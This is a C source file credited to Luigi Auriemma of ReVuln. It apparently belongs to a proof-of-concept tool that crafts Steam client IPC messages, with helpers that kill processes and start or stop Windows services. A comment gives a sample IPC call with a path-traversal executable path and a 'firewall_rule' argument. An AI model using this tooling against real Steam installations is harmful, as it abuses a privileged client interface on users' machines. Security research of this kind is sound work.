/*
by Luigi Auriemma - ReVuln
*/

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;
typedef uint64_t    u64;



#define STEAM_SIZE  0x400



void std_err(void) {
    perror("\nError");
    exit(1);
}



int is_pre_vista(void) {
    DWORD dwVersion = 0; 
    DWORD dwMajorVersion = 0;
    //DWORD dwMinorVersion = 0; 
    //DWORD dwBuild = 0;

    dwVersion = GetVersion();
    dwMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
    //dwMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));
    //if (dwVersion < 0x80000000) dwBuild = (DWORD)(HIWORD(dwVersion));

    if(dwMajorVersion <= 5) return(1);
    return(0);
}



int kill_pid(DWORD pid) {
    HANDLE  hp;

    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(!hp) hp = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
    if(!hp) return(-1);
    TerminateProcess(hp, 0);
    CloseHandle(hp);
    return(0);
}



int search_process(u8 *proc) {
    #define SCAN_PROCESSES_START(X,Y) \
                snap##X = CreateToolhelp32Snapshot(Y, Process.th32ProcessID); \
                X.dwSize = sizeof(X); \
                for(b = X##32First(snap##X, &X); b; b = X##32Next(snap##X, &X)) { \
                    X.dwSize = sizeof(X);
    #define SCAN_PROCESSES_END(X) \
                } \
                CloseHandle(snap##X);

    PROCESSENTRY32  Process;
    HANDLE  snapProcess;
    DWORD   mypid;
    DWORD   pid = 0;
    int     b;
    u8      *p;

    mypid = GetCurrentProcessId();

    Process.th32ProcessID = 0;
    SCAN_PROCESSES_START(Process, TH32CS_SNAPPROCESS)

        if(Process.th32ProcessID == mypid) continue;

        p = strrchr(Process.szExeFile, '\\');
        if(p) p++;
        else  p = Process.szExeFile;
        if(!stricmp(p, proc)) {
            //kill_pid(Process.th32ProcessID);
            pid = Process.th32ProcessID;
            break;
        }

    SCAN_PROCESSES_END(Process)

    return(pid);
}



int putmm(u8 *dst, u8 *src, int len) {
    if(!src) src = "";
    if(len < 0) len = strlen(src);
    memcpy(dst, src, len);
    return(len);
}



int putcc(u8 *dst, int chr, int len) {
    memset(dst, chr, len);
    return(len);
}



int putxx(u8 *dst, u32 num, int bits) {
    int     i,
            bytes;

    if(bits <= 7) bytes = bits;
    else          bytes = bits / 8;
    for(i = 0; i < bytes; i++) {
        dst[i] = num >> (u32)(i << 3);
        //dst[i] = num >> (u32)((bytes - 1 - i) << 3);
    }
    return(bytes);
}



int putsx(u8 *dst, u8 *str) {
    int     len;
    u8      *p;

    if(!str) str = "";
    p = dst;
    len = strlen(str) + 1;
    if(len < 0xff) *p++ = len;
    else *p++ = 0xff; // NULL already included
    p += putmm(p, str, len);
    return(p - dst);
}



int putwx(u8 *dst, u8 *str) {
    int     i,
            len;
    u8      *p;

    if(!str) str = "";
    p = dst;
    len = strlen(str) + 1;
    *p++ = 0xff;
    for(i = 0; i < len; i++) {
        p += putxx(p, str[i], 16);
    }
    return(p - dst);
}



int steam_write(HANDLE hd, int ipc_command_code, u8 *data, int datasz) {
    DWORD   len;
    u8      tmp[4 + 1];

    if((1 + datasz) > STEAM_SIZE) {
        printf("\nError: your data is bigger than 0x%x bytes (%d)\n", STEAM_SIZE, 1 + datasz);
        exit(1);
    }

    putxx(tmp, 1 + datasz, 32);
    tmp[4] = ipc_command_code;
    if(!WriteFile(hd, tmp,  4 + 1,  &len, NULL)) return(-1);
    if(!WriteFile(hd, data, datasz, &len, NULL)) return(-1);
    printf("\n- data:\n");
    show_dump(2, data, datasz, stdout);
    return(0);
}



int windows_service_pending(SC_HANDLE schService, int pending) {
    SERVICE_STATUS_PROCESS ssStatus; 
    DWORD dwOldCheckPoint; 
    DWORD dwStartTickCount;
    DWORD dwWaitTime;
    DWORD dwBytesNeeded;
    
    for(;;) {
        if (!QueryServiceStatusEx( 
            schService,
            SC_STATUS_PROCESS_INFO,
            (LPBYTE) &ssStatus,
            sizeof(SERVICE_STATUS_PROCESS),
            &dwBytesNeeded ) )
        return -1;

        if((pending == SERVICE_RUNNING) || (pending == SERVICE_STOPPED)) {
            if(ssStatus.dwCurrentState == pending) return 0;
            else return -2;
        }
        if(ssStatus.dwCurrentState != pending) break;

        dwStartTickCount = GetTickCount();
        dwOldCheckPoint = ssStatus.dwCheckPoint;
        
        dwWaitTime = ssStatus.dwWaitHint / 10;
        if( dwWaitTime < 1000 ) dwWaitTime = 1000;
        else if ( dwWaitTime > 10000 ) dwWaitTime = 10000;
        Sleep( dwWaitTime );

        if ( ssStatus.dwCheckPoint <= dwOldCheckPoint ) {
            if(GetTickCount()-dwStartTickCount > ssStatus.dwWaitHint) return -3;    // No progress made within the wait hint.
        }
    }
    return 0;
}
    
int windows_service(char *szSvcName, int start_stop, ...) {
    SERVICE_STATUS_PROCESS ssStatus; 
    SC_HANDLE   schSCManager = NULL;
    SC_HANDLE   schService = NULL;
    va_list ap;
    int     ret = 0;
    int     argc = 0;
    LPCTSTR argv[16] = { NULL };    // fixed number of arguments to avoid *alloc

    va_start(ap, start_stop);   // now it's better to avoid stack issues
    for(argc = 0; argc < 16; argc++) {
        argv[argc] = va_arg(ap, char *);
        if(!argv[argc]) break;
    }
    va_end(ap);
    
    schSCManager = OpenSCManager( 
        NULL,
        NULL,
        0x80000000 /*???*/);
    if (!schSCManager) { ret = -1; goto quit; }

    schService = OpenService( 
        schSCManager,
        szSvcName,
        0x80000000 /*???*/ | SERVICE_START | SERVICE_STOP
        | SERVICE_QUERY_STATUS | SERVICE_ENUMERATE_DEPENDENTS);
    if (!schService) { ret = -2; goto quit; }

    if(start_stop) {
    } else {
        if(windows_service_pending(schService, SERVICE_STOP_PENDING)) { ret = 0; goto quit; }
    }
    
    if(windows_service_pending(schService, SERVICE_STOP_PENDING) < 0) { ret = -3; goto quit; }
   
    if(start_stop) {
        if (!StartService(
            schService,
            argc,
            argv) )
        { ret = -4; goto quit; }        
        printf("Service start pending...\n");
    } else {
        //StopDependentServices();  // not implemented
        if ( !ControlService( 
            schService, 
            SERVICE_CONTROL_STOP, 
            (LPSERVICE_STATUS) &ssStatus ) )
        { ret = -4; goto quit; }        
        printf("Service stop pending...\n");
    }
    
    windows_service_pending(schService, start_stop ? SERVICE_START_PENDING : SERVICE_STOP_PENDING);

    if(windows_service_pending(schService, start_stop ? SERVICE_RUNNING : SERVICE_STOPPED) < 0)
    { ret = -5; goto quit; }
    
    printf("Service successfully %s.\n", start_stop ? "started" : "stopped"); 
    ret = 0;

quit:
    if(schService) CloseServiceHandle(schService); 
    if(schSCManager) CloseServiceHandle(schSCManager);
    return ret;
}



u8 *incremental_fread(FILE *fd, u64 *ret_size) {
    static const int    STDINSZ = 4096;
    u64     size,
            buffsz  = 0;
    int     len;
    u8      *buff   = NULL;

    if(ret_size) *ret_size = 0;
    size = 0;
    for(;;) {
        if((size + STDINSZ) >= buffsz) {
            buffsz = size + STDINSZ;
            buff = (u8 *)realloc(buff, buffsz + 1);
            if(!buff) std_err();
        }
        len = fread(buff + size, 1, STDINSZ, fd);
        if(len <= 0) break;
        size += len;
    }
    if(buff) buff[size] = 0;
    if(ret_size) *ret_size = size;
    return(buff);
}



// do not give error, return NULL
u8 *fdload(u8 *fname, u64 *fsize) {
    struct stat xstat;
    FILE    *fd;
    u64     size;
    u8      *buff;

    if(!fname) return(NULL);
    fprintf(stderr, "- %s\n", fname);
    if(!strcmp(fname, "-")) {
        return(incremental_fread(stdin, fsize));
    }
    fd = fopen(fname, "rb");
    if(!fd) return(NULL);
    fstat(fileno(fd), &xstat);
    size = xstat.st_size;
    if(size == -1LL) size = -2;   // lame, impossible case
    buff = calloc(size + 1, 1);
    if(buff) {
        fread(buff, 1, size, fd);
        buff[size] = 0;
    } else {
        size = 0;
    }
    fclose(fd);
    if(fsize) *fsize = size;
    return(buff);
}



// the input can be a file (less resources)
// or a 0x00 delimited buffer (more memory but no problems with file updates)
u8 *get_line(FILE *fd, u8 **fd_buff) {
    static int  buffsz  = 0;
    static u8   *buff   = NULL;
    int     i,
            c,
            eof = 0;

    if(!buff) buff = malloc(1);
    buff[0] = 0;

    for(;;) {
        i = 0;
        for(;;) {
            if(fd) {
                c = fgetc(fd);
            } else {
                c = (**fd_buff);
                if(!c) {
                    c = -1;
                    // leave fd_buff pointing to 0x00
                } else {
                    (*fd_buff)++;
                }
            }
            if(c < 0) { // eof
                eof = 1;
                break;
            }
            if(!c || (c == '\r') || (c == '\n')) break; // eol
            if(!i && (c <= ' ')) continue;  // spaces at beginning
            if(i >= buffsz) {
                buffsz += 1024;
                buff = realloc(buff, buffsz + 1);
                if(!buff) std_err();
            }
            buff[i++] = c;
        }
        buff[i] = 0;
        if(buff[0]) {   // good line, return
            if(buff[0] == '#') continue;    // comment
            break;
        }
        if(eof) return NULL;
    }
    for(--i; i >= 0; i--) {
        if(buff[i] > ' ') break;
        buff[i] = 0;
    }
    return buff;
}



u64 get_num(u8 *s) {
    static const u8 values[] = "0123456789abcdef";
    u64     num = 0;
    int     i,
            c,
            base = 10;
    
    for(i = 0; s[i]; i++) {
        if((s[i] == 'x') && (i == 1)) {   // 0x
            base = 16;
            continue;
        }
        for(c = 0; values[c]; c++) {
            if(tolower(values[c]) == tolower(s[i])) break;
        }
        if(!values[c]) break;
        num = (num * base) + c;
    }
    return num;
}



char **cmdline_to_argv(char *cmdline, int *argc, int real_like) {
    int     i,
            len;
    char    **argv  = NULL,
            *p,
            *l,
            quote;

    if(argc) *argc = 0;

    i = 0;
    if(real_like) {
        argv = realloc(argv, sizeof(char *) * (i + 1));
        if(!argv) std_err();
        argv[i] = strdup("program.exe");
        i++;
    }

    if(cmdline) {
        p = cmdline;
        for(;;) {
            while(*p && (*p <= ' ')) p++;
            if(!*p) break;

            if((*p == '\"') || (*p == '\'')) {
                quote = *p;
                p++;
                for(l = p; *l && (*l != quote); l++) {
                    if((l[0] == '\\') && (l[1] == quote)) l += 2;
                }
            } else {
                for(l = p; *l && (*l > ' '); l++);
            }
            len = l - p;

            argv = realloc(argv, sizeof(char *) * (i + 1));
            if(!argv) std_err();
            argv[i] = malloc(len + 1);
            if(!argv[i]) std_err();
            memcpy(argv[i], p, len);
            argv[i][len] = 0;
            i++;

            if(!*l) break;
            p = l + 1;
        }
    }

    if(argv) {
        argv = realloc(argv, sizeof(char *) * (i + 1));
        if(!argv) std_err();
        argv[i] = NULL;
    }

    if(argc) *argc = i;
    return(argv);
}



void string2guid(u8 *s, u8 *guid) {
    typedef struct {
        u32     a;
        u16     z[10];
    } guid_t;
    guid_t  *x = (guid_t *)guid;
    int     n;
    
    if(!s) return;
    while(*s && (*s == '{')) s++;
    sscanf(s +  0, "%08x", &n); x->a    = n;
    sscanf(s +  9, "%04x", &n); x->z[1] = n;
    sscanf(s + 14, "%04x", &n); x->z[0] = n;
    sscanf(s + 19, "%04x", &n); x->z[3] = n;
    sscanf(s + 24, "%04x", &n); x->z[2] = n;
    sscanf(s + 28, "%04x", &n); x->z[5] = n;
    sscanf(s + 32, "%04x", &n); x->z[4] = n;
}



/*
raw example of how sending the IPC data:

    p = buff
    p += putxx(p, 1, 8);
    p += putxx(p, 0, 32);
        p += putxx(p, 38, 32);
        p += putsx(p, "C:\\Program Files (x86)\\Steam\\..\\..\\..\\..\\ps\\xvi32.exe");
        p += putsx(p, "firewall_rule");
        
    steam_write(hd, 1, buff, p - buff);
*/



int parse_steam_ipc_ini(u8 *buff, u8 *func, char **argv) {
    typedef struct {
        int     id;
        u8      *name;
    } functions_t;

    int     t,
            i,
            n,
            id = -1,
            argn,
            argc;
    u8      tmp[16+1],
            *s,
            *l,
            *p,
            *arg,
            *fd_ptr;
    int     int_types   = 0;
    functions_t *int_type  = NULL;
    static u8   *fd_buff = NULL;
    
    
    if(!fd_buff) {
        fd_buff = fdload("steam_ipc.ini", NULL);
        if(!fd_buff) {
            printf("\nError: file steam_ipc.ini not found in the current folder\n");
            exit(1);
        }
    }
    fd_ptr = fd_buff;
    
    
    p = buff;
    
    id = -1;
    argn = 0;
    for(;;) {
        s = get_line(NULL, &fd_ptr);
        if(!s) break;
        if(!stricmp(s, "MY_PROCESSID")) sprintf(s, "%u", (int)GetCurrentProcessId());
        
        if(sscanf(s, "%*s%n = %d", &n, &t) == 1) {
            int_type = realloc(int_type, sizeof(functions_t) * (int_types + 1));
            int_type[int_types].id   = t;
            s[n] = 0;
            int_type[int_types].name = strdup(s);
            int_types++;
        }
        
        l = strstr(s, "::");
        if(l) {
            if(id >= 0) break;
            
            *l = 0;
            l += 2;
            if(sscanf(s, "%d %n%*s", &t, &n) == 1) {
                if(!stricmp(l, func)) {
                    for(i = 0; i < int_types; i++) {
                        if(!stricmp(s + n, int_type[i].name)) {
                            id = int_type[i].id;
                            p += putxx(p, id, 8);   // Interface Type
                            p += putxx(p, 0, 32);   // hSteamUser (MUST BE ZERO)
                            p += putxx(p, t, 32);   // Function
                        }
                    }
                }
            }
            
        } else if(id >= 0) {
            if(!argv[argn]) argc = argn;
            if(argn < argc) arg = argv[argn];
            else            arg = "";
        
            if(!stricmp(s, "string")) {
                p += putsx(p, arg);
                
            } else if(!stricmp(s, "int8") || !stricmp(s, "bool") || !stricmp(s, "char")) {
                p += putxx(p, get_num(arg), 8);
                
            } else if(!stricmp(s, "int32") || !stricmp(s, "int")) {
                p += putxx(p, get_num(arg), 32);
                
            } else if(!stricmp(s, "guid")) {
                string2guid(arg, tmp);
                p += putmm(p, tmp, 16);
                
            } else {
                printf("\nError: invalid IPC argument prototype \"%s\"\n", s);
                exit(1);
            }
            argn++;
        }
    }
    
    //free(fd_buff);
    return p - buff;    
}



int parse_steam_ipc_ini2(u8 *buff, u8 *func, ...) {
    va_list ap;
    int     argc = 0;
    char    *argv[16] = { NULL };    // fixed number of arguments to avoid *alloc

    va_start(ap, func);   // now it's better to avoid stack issues
    for(argc = 0; argc < 16; argc++) {
        argv[argc] = va_arg(ap, char *);
        if(!argv[argc]) break;
    }
    va_end(ap);
    
    return parse_steam_ipc_ini(buff, func, argv);
}


